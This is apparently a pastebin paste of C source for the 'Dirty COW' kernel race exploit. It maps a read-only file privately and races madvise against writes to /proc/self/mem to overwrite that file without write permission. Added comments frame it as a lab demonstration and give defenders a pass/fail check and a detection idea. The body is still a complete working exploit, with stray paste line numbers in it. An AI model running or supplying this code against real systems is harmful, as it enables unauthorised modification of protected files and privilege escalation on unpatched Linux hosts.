
Untitled

Guest on 3rd May 2022 12:00:15 PM

  #include <fcntl.h>
  #include <pthread.h>
  #include <stdint.h>
  #include <stdio.h>
  #include <string.h>
  #include <unistd.h>
  #include <sys/mman.h>
  #include <sys/stat.h>
  6.  
  7. void *map;  // Base address of the MAP_PRIVATE file mapping; assigned once in main(), read by madviseThread().
  8. void *writeThread(void *arg);  // Thread entry; arg is the in-process address main() located with strstr().
  9. void *madviseThread(void *arg);  // Thread entry; arg carries the mapping length cast into a pointer value.
  10.  
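  /*
   * Lab demonstration of a copy-on-write (COW) race on a read-only file.
   *
   * The program maps /zzz privately and read-only, then starts two threads
   * that run concurrently against that mapping: one repeatedly discards the
   * mapped pages with madvise(MADV_DONTNEED), the other repeatedly writes
   * through /proc/self/mem at the address of a marker string. This looks like
   * the pattern commonly referred to as the "Dirty COW" race -- confirm
   * against the lab material this paste was taken from.
   *
   * Reviewer notes for defenders:
   *  - On a kernel that handles the COW fault correctly, writes through
   *    /proc/self/mem land in the process-private copy and /zzz on disk is
   *    left unchanged; checking the file after a run is the pass/fail signal
   *    for a patched host.
   *  - A process that opens /proc/self/mem read-write while a sibling thread
   *    hammers madvise(MADV_DONTNEED) on a private file mapping is an unusual
   *    combination and a reasonable thing to alert on.
   *
   * Returns 0 if both threads are joined (they loop forever, so in practice
   * the process has to be interrupted), or 1 when setup fails.
   */
  int main(int argc, char *argv[])
  {
    pthread_t pth1, pth2;
    struct stat st;
    int file_size;

    (void)argc;
    (void)argv;

    // Open the target file read-only; the process needs no write permission.
    int f = open("/zzz", O_RDONLY);
    if (f < 0) {
      perror("open /zzz");
      return 1;
    }

    if (fstat(f, &st) != 0) {
      perror("fstat");
      close(f);
      return 1;
    }

    // Reject empty files and sizes that do not survive the narrowing to int,
    // since file_size is later passed to mmap() and madvise() as a length.
    file_size = (int)st.st_size;
    if (file_size <= 0 || (off_t)file_size != st.st_size) {
      fprintf(stderr, "unsupported file size\n");
      close(f);
      return 1;
    }

    // Map the file as private (copy-on-write), read-only memory.
    map = mmap(NULL, file_size, PROT_READ, MAP_PRIVATE, f, 0);
    if (map == MAP_FAILED) {
      perror("mmap");
      close(f);
      return 1;
    }

    // Locate the marker inside the mapping.
    // NOTE(review): strstr() relies on a NUL byte following the file data; a
    // file whose size is an exact multiple of the page size has no zero-filled
    // tail inside the mapping, so the search can read past it.
    char *position = strstr(map, "222222");
    if (position == NULL) {
      fprintf(stderr, "marker not found in /zzz\n");
      munmap(map, file_size);
      close(f);
      return 1;
    }

    // The length travels to the thread inside the pointer argument; going
    // through intptr_t makes the int-to-pointer conversion explicit.
    if (pthread_create(&pth1, NULL, madviseThread,
                       (void *)(intptr_t)file_size) != 0 ||
        pthread_create(&pth2, NULL, writeThread, position) != 0) {
      fprintf(stderr, "pthread_create failed\n");
      munmap(map, file_size);
      close(f);
      return 1;
    }

    // Both threads loop without an exit condition, so these joins block until
    // the process is terminated from outside.
    pthread_join(pth1, NULL);
    pthread_join(pth2, NULL);

    munmap(map, file_size);
    close(f);
    return 0;
  }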
  37.  
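  /*
   * Thread body: repeatedly write a fixed six-byte string through
   * /proc/self/mem at the address passed in arg.
   *
   * arg is an address inside this process (main() passes the location of the
   * marker in its private mapping). /proc/self/mem is addressed by virtual
   * address, which is why the pointer value is used directly as the file
   * offset.
   *
   * The loop has no exit condition. The function returns NULL only when arg
   * is NULL or /proc/self/mem cannot be opened, instead of spinning on a
   * descriptor of -1 as the unchecked version would.
   *
   * Reviewer note: lseek()/write() results are deliberately not checked
   * inside the loop; on a correctly behaving kernel the write affects only
   * the process-private copy of the page, not the backing file.
   */
  void *writeThread(void *arg)
  {
    const char *content = "******";
    size_t content_len = strlen(content);

    if (arg == NULL) {
      return NULL;
    }
    // Convert via uintptr_t so the pointer-to-integer step is explicit.
    off_t offset = (off_t)(uintptr_t)arg;

    int f = open("/proc/self/mem", O_RDWR);
    if (f < 0) {
      perror("open /proc/self/mem");
      return NULL;
    }

    while (1) {
      // Move the file pointer to the corresponding position.
      lseek(f, offset, SEEK_SET);
      // Write to the memory.
      write(f, content, content_len);
    }
  }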
  51.  
  /*
   * Thread body: repeatedly tell the kernel that the pages of the global
   * mapping `map` are no longer needed.
   *
   * arg is not dereferenced; it carries the mapping length as an integer
   * stored in the pointer value. The loop never terminates, so the function
   * does not return.
   */
  void *madviseThread(void *arg)
  {
    int length = (int) arg;

    for (;;) {
      // Discard the private pages so the next access faults them in again.
      madvise(map, length, MADV_DONTNEED);
    }
  }
